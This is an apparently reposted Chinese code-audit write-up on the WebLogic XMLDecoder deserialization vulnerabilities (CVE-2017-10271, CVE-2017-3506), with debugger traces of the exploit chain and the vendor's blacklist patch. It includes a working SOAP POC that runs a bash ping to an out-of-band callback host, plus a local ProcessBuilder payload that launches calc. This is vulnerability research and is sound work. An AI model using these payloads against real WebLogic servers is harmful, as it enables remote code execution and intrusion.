天津储鑫盛钢材现货供应商 发表于 2024-8-20 22:06:05

WebLogic历史漏洞代码审计(二):WebLogic-XMLDecoder反序列化漏洞分析

WebLogic历史漏洞代码审计(二):WebLogic-XMLDecoder反序列化漏洞分析



简介

Weblogic反序列化高危漏洞主要涉及到两个种类:
1、利用xml decoded反序列化举行长途代码执行的漏洞,例如:
CVE-2017-10271,CVE-2017-3506
2、利用java反序列化举行长途代码执行的漏洞,例如:
CVE-2015-4852、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2018-2628、CVE-
2018-2894
本章主要讲CVE-2017-10271,CVE-2017-3506的代码分析
以上一篇文章搭建的CVE-2017-10271审计环境为例,我将CVE-2017-10271的利用链分为两部分
第一部分利用链为WorkContextServerTube#processRequest到WorkContextXmlInputAdapter#readUTF
即为/wls-wsat/CoordinatorPortType路径接收POC到其被xmldecoder.readobject调用
第二部分利用链为xmldecoder.readobject触发反序列化从而执行命令的过程
前置知识

漏洞成因

漏洞在WLS-WebServices这个组件中,基于WLS wsat模块,焦点就是XMLDecoder的反序列化漏洞,Java 调用XMLDecoder解析XML文件的时候,存在命令执行漏洞,所以我们主要研究第二部分利用链xmldecoker是如何导致命令执行的。
打开wls-wsat.war!/WEB-INF/web.xml,可以发现存在漏洞的 wls-wsat 组件中包含不同的路由,均能触发漏洞,我们第一个利用链的接收路径即为图中的/wls-wsat/CoordinatorPortType
https://i-blog.csdnimg.cn/direct/c2aea06d8930420b9268e50b0c264193.png
XMLEncoder&XMLDecoder

XMLDecoder/XMLEncoder 是在JDK1.4版中添加的 XML 格式序列化持久性方案,利用 XMLEncoder 来生成表现 JavaBeans 组件(bean)的 XML 文档,用 XMLDecoder 读取利用 XMLEncoder 创建的XML文档获取JavaBeans。
说白了这两个类的主要功能就是序列化与反序列化,其调用了readobject与writeobject方法来实现功能
XML标签、属性介绍

string标签

hello,xml字符串的表现方式为<string>Hello,xml</string>
object标签

通过 标签表现对象, class 属性指定具体类(用于调用其内部方法),method 属性指定具体方法名称(比如构造函数的的方法名为 new )
new JButton(“Hello,xml”) 对应的XML文档:
<object class="javax.swing.JButton" method="new">
    <string>Hello,xml</string>
</object>
void标签

通过 void 标签表现函数调用、赋值等操纵, method 属性指定具体的方法名称。
JButton b = new JButton();b.setText(“Hello, world”); 对应的XML文档:
<object class="javax.swing.JButton">
    <void method="setText">
    <string>Hello,xml</string>
    </void>
</object>
array标签

通过 array 标签表现数组, class 属性指定具体类,内部 void 标签的 index 属性表现根据指定数组索引赋值。
String[] s = new String;s = “Hello,xml”; 对应的XML文档:
<array class="java.lang.String" length="3">
    <void index="1">
    <string>Hello,xml</string>
</void>
</array>
XMLDecoder利用的是SAX解析规范

SAX是简朴XML访问接口,是一套XML解析规范,利用事件驱动的设计模式,那么事件驱动的设计模式自然就会有事件源和事件处置惩罚器以及相关的注册方法将事件源和事件处置惩罚器毗连起来。
图片来自:https://mp.weixin.qq.com/s/qxkV_7MZVhUYYq5QGcwCtQ
https://i-blog.csdnimg.cn/direct/34c90a1c918246f8899f7a16b0d18f66.png
本章第二部分利用链即为通过JAXP的工厂方法生成SAX对象,SAX对象利用SAXParser.parer()作为事件源,ContentHandler、ErrorHandler、DTDHandler、EntityResolver作为事件处置惩罚器,通过注册方法将二者毗连起来。
apache xerces

apache xerces是XMLDecoder解析XML时的一个重要组件。
apache xerces是一个用于解析XML中有哪些标签,语法是否合法的解析器,官方在JDK1.5便集成了此解析器并作为XML的默认解析器。
在XML序列化数据传达至XMLDecoder.readObject() 方法举行反序列化等操纵后,便会传递给xerces举行解析,在xerces解析完毕后数据便会交给DocumentHandler完成后续的操纵,如果是JDK1.6便会交给ObjectHandler举行处置惩罚。
DocumentHandler

DocumentHandler(com.sun.beans.decoder.DocumentHandler)在XMLDecoder处置惩罚XML数据时起到事件处置惩罚器的作用,它在JDK1.7中被实现。
它会跟进传入的XML标签,属性等信息调用不同的Handler举行事件处置惩罚
我们针对XMLDecoder的反序列化攻击便是传入特定的XML序列化数据由DocumentHandler举行事件处置惩罚,进而实现RCE等攻击。
下图是jdk8 DocumentHandler中所界说的各种标签的处置惩罚办法。
https://i-blog.csdnimg.cn/direct/5649b4c4156844e19273891c55cc9ae8.png
各种handler的处置惩罚机制分析

只有相识handler的处置惩罚机制才会知道不同handler是如何处置惩罚完xml并将其构造为具体的代码并实验的
不同的XML标签对应着不同的handler,也就对应着不同的处置惩罚机制。
大多数handler都有addAttribute方法,这个方法主要用于提取标签中的属性并举行处置惩罚;
以及getValueObject方法,这个方法主要用于获取标签的值。
JavaElementHandler

处置惩罚java标签的Handler,var1对应着属性名,var2对应着属性值,java标签会根据class属性中的值举行类加载,也就是**this.type = this.getOwner().findClass(var2);**的作用
https://i-blog.csdnimg.cn/direct/b036b36e7c1b4080ae80eac1bd7ecefa.png
NewElementHandler

处置惩罚New标签的Handler,也会举行类加载操纵,不外NewElementHandler是很多handler的父类(如ArrayElementHandler,ObjectElementHandler),这就意味着NewElementHandler的子类也可以举行类加载,因为addAttribute中的else逻辑,不存在的属性名从父类找
https://i-blog.csdnimg.cn/direct/09e4624a6a034f78b0d722b1776314e0.png
ObjectElementHandler

处置惩罚Object标签的Handler,为NewElementHandler的子类,也可以举行类加载
https://i-blog.csdnimg.cn/direct/443a3a156c0843f1893d01cf27d83b1d.png
VoidElementHandler

处置惩罚Void标签的Handler,为ObjectElementHandler的子类,所以基本功能都一样
https://i-blog.csdnimg.cn/direct/2a18df984a624ccc861b157db6fc30e8.png
CVE-2017-10271

POC

发送POC后去DNSLog网站看看,ping通了代表复现成功
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
accept: */*
Connection: close
Content-Length: 843
Content-Type: text/xml
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh,zh-CN;q=0.9,en-US;q=0.8,en;q=0.7

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8.0_131" class="java.beans.XMLDecoder">
          <void class="java.lang.ProcessBuilder">
            <array class="java.lang.String" length="3">
            <void index="0">
                <string>/bin/bash</string>
            </void>
            <void index="1">
                <string>-c</string>
            </void>
            <void index="2">
                <string>ping dwbvvusntnkyqbscaeas4woks5gq9g503.oast.fun</string>
            </void>
            </array>
          <void method="start"/></void>
      </java>
      </work:WorkContext>
    </soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
第一部分利用链调试分析

weblogic.wsee.jaxws.workcontext.WorkContextServerTube#processRequest
1,如下图打上断点,启动调试
https://i-blog.csdnimg.cn/direct/c53352d6437549478553cc642242c4a3.png
2,burp发包,由于上一篇搭建的是本机的docker环境,发本机指定的7001端口(weblogic的运行端口)即可
https://i-blog.csdnimg.cn/direct/22ecc5b84a514f69af7c1023b2cc859e.png
weblogic.wsee.jaxws.workcontext.WorkContextServerTube#processRequest
3,发包后自动跳转到调试界面,开始调试
这里的var1即为我们发送的恶意SOAP(xml)数据,var2是数据中的headers,var3则是获取var2的数组中的第一个StreamHeader得到的数据,并将其传入readHeaderOld函数中
https://i-blog.csdnimg.cn/direct/0e9278e9ec4f426c9df3e55344197689.png
weblogic.wsee.jaxws.workcontext.WorkContextTube#readHeaderOld
4,var4 的字节数组输入流传入 WorkContextXmlInputAdapter 的构造函数,var4即为我们的xml数据中执行命令的xml数据
https://i-blog.csdnimg.cn/direct/6b8840a70c38424d9d70e9f3d7f5cac1.png
https://i-blog.csdnimg.cn/direct/7def6f7128f24032ba842265a12fa8ff.png
weblogic.wsee.workarea.WorkContextXmlInputAdapter#WorkContextXmlInputAdapter
5,将var1中的xml输入流传入XMLDecoder的构造函数中,构造函数会将其保存在in属性中
https://i-blog.csdnimg.cn/direct/d106902e9ce24fba8a8a6b037143a60a.png
https://i-blog.csdnimg.cn/direct/990d00fb8f8341a69796aa53169ed56b.png
对比XMLDecoder.in与var1中的buf可知字节输入流传入进去了
https://i-blog.csdnimg.cn/direct/c619dcfa80a440549c339a23157ed504.png
weblogic.wsee.jaxws.workcontext.WorkContextServerTube#receive
6,接着返回到第4步,返回一个包含XMLDecoder数据的WorkContextXmlInputAdapter var6实例对象,其实就是对var4举行了一个类型转化,并将其传入receive中
https://i-blog.csdnimg.cn/direct/ce46a754f6c64c578ec7f819b540bd5d.png
weblogic.wsee.jaxws.workcontext.WorkContextServerTube#receive
7,将其传入receiveRequest中,继续跟进
https://i-blog.csdnimg.cn/direct/638a905013544fc4971293757e29103f.png
weblogic.workarea.WorkContextMapImpl#receiveRequest
8,被传递到 WorkContextLocalMap 类的 receiveRequest中,继续跟进
https://i-blog.csdnimg.cn/direct/9b900ea51b524abcbc08c63b9f52a971.png
weblogic.workarea.WorkContextLocalMap#receiveRequest
9,传入readEntry中,继续跟进
https://i-blog.csdnimg.cn/direct/0ed910a9689f42a3a517759802f4b92f.png
weblogic.workarea.spi.WorkContextEntry
10,继续跟进readUTF
https://i-blog.csdnimg.cn/direct/697f9ddef7984c919475e79c2157dcf5.png
11,到这一步调用了var0的xmlDecoder.readObject方法,开始反序列化,第一部分调用链到此为止
https://i-blog.csdnimg.cn/direct/48ea7ca9eb294c609c8edeb1a7cedac8.png
这一部分利用链主要实现了两个功能,其一为将传入的SOAP形式的XML数据过滤并赋值给受害机的XMLDecoder实例对象中,其二为触发这个XMLDecoder的readobject方法(可以得知在构造POC时需要写SOAP形式的恶意XML数据)
可以参考下这个demo,本质上等同于第一部分利用链实现的全部功能,有助于各人的进一步理解,1.xml即为恶意XML代码
package xml;

import java.beans.XMLDecoder;
import java.io.BufferedInputStream;
import java.io.FileInputStream;
import java.io.FileNotFoundException;

public class XmlDecoder {
    public static void main(String[] args) throws FileNotFoundException {
      XMLDecoder d = new XMLDecoder(new BufferedInputStream(new FileInputStream("C:\\Users\\86137\\Desktop\\Maven3-jdk8\\1.xml")));
      Object result = d.readObject();
      System.out.println(result);
      d.close();
    }
}
1.xml
<java>
    <object class="java.lang.ProcessBuilder">
      <array class="java.lang.String" length="1">
            <void index="0">
                <string>calc</string>
            </void>
      </array>
      <void method="start"></void>
    </object>
</java>

第二部分利用链调试分析

第二部分在Maven3-jdk8项目环境下的demo(上面给的谁人demo)举行调试分析了,poc也换为1.xml,方便进一步分析
XMLDecoder处置惩罚xml的流程为 :XMLDecoder.readObject() ->xerces解析->DocumentHandler事件处置惩罚
xml.XmlDecoder
1,调试界面如图所示,因为demo就是第一部分利用链的复现,所以直接对demo举行本地调试,长途调试实在麻烦,,能本地还是本地吧
https://i-blog.csdnimg.cn/direct/7cebf53e137d424692ff97bd456defcb.png
java.beans.XMLDecoder#readObject
2,进入readObject,其调用了parsingComplete(),继续跟进
https://i-blog.csdnimg.cn/direct/3c4f9350eb004b5e9bbb526d06187561.png
https://i-blog.csdnimg.cn/direct/8c05996be6d74df0811867d06abd4063.png
com.sun.beans.decoder.DocumentHandler#parse
3,根据前置知识中的(XMLDecoder利用的是SAX解析规范)可知,xmldecoder解析xml数据是利用SAX对象的SAXParser.parer() 作为事件源来举行解析,这行代码就是利用SAXParser工厂创建一个SAX对象,并调用其解析方法
https://i-blog.csdnimg.cn/direct/403fa36cd1ec40b8a634d64a8fdb8985.png
此中DocumentHandler.this就是对XML标签举行解析处置惩罚的Handler合集
https://i-blog.csdnimg.cn/direct/babb472fb9694f399a7f76a0eb3e7620.png
com.sun.org.apache.xerces.internal.jaxp.SAXParserImpl#parse
4,这里设置了Handler,继续根据parse
https://i-blog.csdnimg.cn/direct/7de1f1fbcc8e47ecb2262e6ee69007b9.png
com.sun.org.apache.xerces.internal.jaxp.SAXParserImpl.JAXPSAXParser#parse
5,进入到重载的parse,继续跟进
https://i-blog.csdnimg.cn/direct/134be9fbd5d94d3ea7d35e219f51ca9e.png
com.sun.org.apache.xerces.internal.parsers.AbstractSAXParser#parse
6,将inputSource赋值给xmlInputSource,继续跟进
https://i-blog.csdnimg.cn/direct/7b08ee816de242f8b0d96d07a2f4158d.png
com.sun.org.apache.xerces.internal.parsers.XMLParser#parse
7,继续跟进parse解析
https://i-blog.csdnimg.cn/direct/caf8879ad9ed415ebe54f2057a8c68da.png
com.sun.org.apache.xerces.internal.parsers.XML11Configuration#parse
8,继续跟进parse(boolean)解析
https://i-blog.csdnimg.cn/direct/eb70b2af8c5b416a9819797b0052bfc7.png
com.sun.org.apache.xerces.internal.parsers.XML11Configuration#parse(boolean)
9,跟进到scanDocument中
https://i-blog.csdnimg.cn/direct/90dd002b4c8d4d3798804d7ecbccae45.png
com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl#scanDocument
10,由此进入到xerces解析的流程,可见do…while循环包含着switch…case与next(),由此来实现对xml标签的遍历,这里有个要注意的点,如图中的switch…case下面的代码都被解释掉了,真正的标签抉择是在next()中实现的
在如下图的next()上打断点,跟进
https://i-blog.csdnimg.cn/direct/2642b64c6be34861bf754494ca7474da.png
https://i-blog.csdnimg.cn/direct/640a5adc63a54682acfb42c162284e7d.png
com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl#next
com.sun.org.apache.xerces.internal.impl.XMLDocumentScannerImpl.PrologDriver#next
11,跟进两次next,到包含switch…case的PrologDriver#next,这才是真正对标签举行便利筛选的地方
https://i-blog.csdnimg.cn/direct/87561396574640c1838493276188debe.png
https://i-blog.csdnimg.cn/direct/827c1af0a55643b890ad6877c156e424.png
12,在如下图所示打上断点,分别为识别到结束标签与识别到开始标签时需要跟进的地方,由此可以大概理解解析标签的设计思绪:
先举行几次循环,先遇见开始标签,将其push标签堆fElementStack中,并将其传入startelement,根据标签名将其传入对应的Handler举行实例化,并通过链表的形式将一个个父子毗连在一起,对应xml的标签之间的包含形式,当第n次循环时,第一次遇见结束标签,利用pop从fElementStack得到与startelement对应的标签,传入endelement,并调用getValueObject得到标签中的数据,传入Handler中。
https://i-blog.csdnimg.cn/direct/0d7b405c1dac4151b41767232f5ff7c4.png
https://i-blog.csdnimg.cn/direct/a50a71de575b4f1392c920632fc51a9d.png
com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl#scanStartElement
13,从第一个开始标签<java>,fElementQName.setValues将name=“java”添加进fElementStack中
https://i-blog.csdnimg.cn/direct/538acf9bb139471d96d01afd435d118f.png
com.sun.beans.decoder.DocumentHandler#startElement
14,跟进到startelement,可知其先跟进传入的var3来得到对应的javaelement实例,并设置Owner与Parent,方便下一个循环来毗连成链表,之后在for循环中将标签中的属性名与属性值添加进去
https://i-blog.csdnimg.cn/direct/e5bf32df7772403aaf740a8b83f12535.png
15,遇到第二个开始标签<Object>,设置完Owner与Parent,进入到循环中,将其属性名与属性值参加Handler中
https://i-blog.csdnimg.cn/direct/52d33081add54e36a7c0abf5a940643c.png
https://i-blog.csdnimg.cn/direct/d39343cac7ec45108dc4364519dd6f14.png
com.sun.beans.decoder.ObjectElementHandler#addAttribute
16,知识前缀提到过,ObjectElementHandler自己不能举行类加载,所以要调用父类NewElementHandler举行类加载
https://i-blog.csdnimg.cn/direct/55c33e17b55c41318d55cd3b0b8d4fc5.png
com.sun.beans.decoder.NewElementHandler#addAttribute
https://i-blog.csdnimg.cn/direct/d9f6b14307954c89a2098c42f30be8e2.png
com.sun.beans.decoder.ElementHandler#endElement
17,直到遇见第一个结束标签</String>时,会调用endElement,并通过getValueObject获取对应标签中的数据
https://i-blog.csdnimg.cn/direct/ffd15d8007e4432b8a0c054d6432e612.png
com.sun.beans.decoder.StringElementHandler#getValueObject
18,this.sb即为存储的数据,将其赋值给this.value,并返回一个ValueObjectImpl的实例
https://i-blog.csdnimg.cn/direct/8a4329becf0b4ceba041168e0c343846.png
https://i-blog.csdnimg.cn/direct/9b258e2b7ca84db9b3d1e283db39fbb3.png
com.sun.beans.decoder.ElementHandler#endElement
19,将返回的ValueObjectImpl实例赋值给var1后,var1取出value添加到<String>标签的父标签<Void>的handler也就是VoidElementHandler的Arguments数组中
https://i-blog.csdnimg.cn/direct/e1c2c498668a44e48c0a26d3b7af2d1d.png
https://i-blog.csdnimg.cn/direct/2d2b33756094400890861eefbeaab4a4.png
com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl#scanEndElement
20,接下来再处置惩罚</void>标签,通过next()中的switch…case,进入到scanEndElement,并pop之前创建的标签堆从而对称的得出与startelelment对应的标签名
https://i-blog.csdnimg.cn/direct/3957ca4b3fc44b4ba110987f0be15984.png
21,调用VoidElementHandler的getValueObject(),void的handler没有getValueObject()现实上是调用父类的父类NewElementHandler的getValueObject()
https://i-blog.csdnimg.cn/direct/a7f10266c2504156adbc1a34296dee09.png
https://i-blog.csdnimg.cn/direct/ea50e0278609419b8c5a8f9e1379eee1.png
com.sun.beans.decoder.NewElementHandler#getValueObject()
22,由于第19步将<string>标签的值传入VoidElementHandler的arguments,所以该标签带有数据,需要进一步组装数据
https://i-blog.csdnimg.cn/direct/db12a7ca488a4184ad8e08f5a3d873b2.png
com.sun.beans.decoder.ObjectElementHandler#getValueObject
23,这里的多个if检测<void>的属性名,以此来判定该<void>标签的作用,这里会停止在代码58行,标签的作用为数组元素的排序数,var4=set,并new一个Expression(表达式),传入set赋值给var5,并通过var5.getValue()来执行set方法将calc传入array
由第2,3张图片可知,图1的56行getContextBean是调用父类的type属性,即第16的图二标签中“class”属性名对应的属性值“java.lang.String”
https://i-blog.csdnimg.cn/direct/ae6f8d714967407396c9309b4f0944d1.png
https://i-blog.csdnimg.cn/direct/40d77a417aaa4bb3a43e09ed808fcbce.png
https://i-blog.csdnimg.cn/direct/c0131d26a3af43ecbc4e914c70b16000.png
https://i-blog.csdnimg.cn/direct/0f7595436308489d88169323bf26b40d.png
com.sun.beans.decoder.ElementHandler#endElement
24,接下来再处置惩罚</array>标签,将“calc”参加父类ObjectElementHandler的Arguments数组中
https://i-blog.csdnimg.cn/direct/2c01ecc3c44146fa8a527e69f66a109e.png
com.sun.beans.decoder.ObjectElementHandler#getValueObject
25,接下来再处置惩罚</void>标签,还是如23先用getContextBean() 获取父标签“class”属性名对应的属性值“java.lang.ProcessBuilder”,并获取Value值“calc”,并返回ProcessBuilder的实例对象Var2https://i-blog.csdnimg.cn/direct/d4d9a37c004c452a9a783eba827f343c.png
com.sun.beans.decoder.ElementHandler#getContextBean
26,跟进getContextBean() ,发现他调用了ObjectElementHandler的getValueObject
https://i-blog.csdnimg.cn/direct/6703ac201d7b429cb6590daad2a670fa.png
com.sun.beans.decoder.ObjectElementHandler#getValueObject
27,由于ObjectElementHandler的method为空,把new作为Var4代入Expression表达式,得到new ProcessBuilder(“calc”)
https://i-blog.csdnimg.cn/direct/0cec88ac1cff4a34aca373f7a43803a6.png
28,返回到getValueObject,<void>标签的method为“start”,将var3=new ProcessBuilder(“calc”),var4=“start”,代入Expression构造中,拼接为new ProcessBuilder(“calc”).start(),再通过getValue启动start方法,命令执行,结束
https://i-blog.csdnimg.cn/direct/bd1f0c4b889647e089ab1192abbfb33d.png
漏洞修补方法

CVE-2017-10271的补丁是把黑名单补全,可见除了object,还有method,new,array等标签都被做了处置惩罚。
object,new,method标签直接被ban,void属性只能设置index,array的class只能设置为byte类型。
private void validate(InputStream is) {
   WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory();
   try {
      SAXParser parser = factory.newSAXParser();
      parser.parse(is, new DefaultHandler() {
         private int overallarraylength = 0;
         public void startElement(String uri, String localName, String qName, Attributes attributes) throws SAXException {
            if(qName.equalsIgnoreCase("object")) {
               throw new IllegalStateException("Invalid element qName:object");
            } else if(qName.equalsIgnoreCase("new")) {
               throw new IllegalStateException("Invalid element qName:new");
            } else if(qName.equalsIgnoreCase("method")) {
               throw new IllegalStateException("Invalid element qName:method");
            } else {
               if(qName.equalsIgnoreCase("void")) {
                  for(int attClass = 0; attClass < attributes.getLength(); ++attClass) {
                     if(!"index".equalsIgnoreCase(attributes.getQName(attClass))) {
                        throw new IllegalStateException("Invalid attribute for element void:" + attributes.getQName(attClass));
                     }
                  }
               }
               if(qName.equalsIgnoreCase("array")) {
                  String var9 = attributes.getValue("class");
                  if(var9 != null && !var9.equalsIgnoreCase("byte")) {
                     throw new IllegalStateException("The value of class attribute is not valid for array element.");
                  }
补丁绕过
大概思绪见我下面推荐的大佬建议,得靠各人自己研究了
总结

本篇文章为了方便各人理解,基本把全部的历程跟进都截图了进去,如果以为麻烦,可以看完我的解析,对自己想相识的地方打断点即可,尤其是next谁人地方,很轻易搞乱,建议多看几次
xmldecoder就是利用栈与链数据结论实现对xml数据的对象化映射,将其拼接到Expression表现式再利用反射去执行方法
参考文档

https://www.freebuf.com/vuls/303796.html
https://www.freebuf.com/articles/web/363612.html
https://xz.aliyun.com/t/8465?time__1311=n4%2BxuDgDBDyDnDfhYxlxGhb7eWy1tQCeD&alichlgref=https%3A%2F%2Fcn.bing.com%2F#toc-7
https://da22le.github.io/java-xmldecoder%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%86%E6%9E%90/
https://cloud.tencent.com/developer/article/1957183(强烈推荐多看看大佬的,这是唯一一个将xmldecoder全部基本组件都讲清楚并以此逐步分析的)

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: WebLogic历史漏洞代码审计(二):WebLogic-XMLDecoder反序列化漏洞分析